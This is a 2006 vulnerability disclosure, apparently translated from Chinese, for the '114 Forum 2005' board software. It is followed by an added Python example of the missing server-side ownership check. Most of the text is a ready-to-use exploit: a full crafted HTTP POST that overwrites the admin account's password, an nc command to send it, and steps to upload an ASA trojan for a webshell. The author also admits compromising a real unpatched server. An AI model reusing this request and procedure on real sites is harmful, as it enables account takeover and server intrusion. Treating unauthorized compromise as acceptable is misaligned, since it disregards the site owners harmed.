
Vulnerability disclosure: vulnerability in 114 Forum 2005 official release

Author: 孟翔飞 Source: 安全中国 Added: 2006-5-26 13:18:10

Change the first "33221" to "admin" and save the text as 11.txt, so that it reads:

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

Host: www.***.net.cn

Content-Length: 2304

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserCode"

admin

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtConfirmPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtQuestion"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAnswer"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserName"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="selSex"

先生

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtNick"

11

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtProvince"

111

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtfile"; filename=""

Content-Type: application/octet-stream

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="submit"

修改注册信息

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

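Because the user name I registered, 33221, is the same length as admin, the byte length does not need to be changed here.

Then submit it to the server with nc: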

nc www.***.net.cn 80 <11.txt

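The response reports that the member profile was modified successfully.

Then log in as admin, using the same password that was set when registering 33221.

This is of course administrator privilege. Then log in to the admin back end, click "Modify Columns" (修改栏目), upload an asa trojan, and OK, you have a webshell.

I took a look, and this forum system has no patch out yet, so a large batch of webshells could be obtained; however, I only took the one server that was fairly useful to me and did not go after the others.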
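The request above succeeds because SaveUser_Account.asp evidently chooses the record to update from the submitted txtUserCode field instead of from the logged-in session. The following is an added example, not code from the original article or from the forum itself (which is ASP): a Python model of the missing server-side check. The session_user argument, the accounts dict and the build_body helper are assumptions made for illustration; only the form field names come from the captured request.

```python
# Added example: the server-side ownership check missing from the flow above.
# Field names are taken from the captured request; all data here is constructed.
import re

BOUNDARY = "-" * 27 + "7d61e41d605f6"   # value of the boundary= header parameter

def parse_fields(body: str, boundary: str) -> dict:
    """Return {name: value} for the parts of a multipart/form-data body."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        head, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', head)
        if m:
            fields[m.group(1)] = value.strip("\r\n")
    return fields

def save_account(session_user, fields: dict, accounts: dict) -> bool:
    """Update the logged-in member's own record, never the one named in the form."""
    if session_user is None or session_user not in accounts:
        return False                          # no authenticated session
    if fields.get("txtUserCode", session_user) != session_user:
        return False                          # form names another account: reject and log
    pw = fields.get("txtPassword")
    if not pw or pw != fields.get("txtConfirmPassword"):
        return False
    # Model only: a real store would keep a salted hash, not the password.
    accounts[session_user]["password"] = pw
    return True

def build_body(values: dict) -> str:
    """Construct a sample body laid out like the captured request."""
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in values.items()]
    return "".join(parts) + f"--{BOUNDARY}--\r\n"
```

The record key comes from server-side session state; a mismatch between the session and txtUserCode is also a useful signal to log and alert on.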
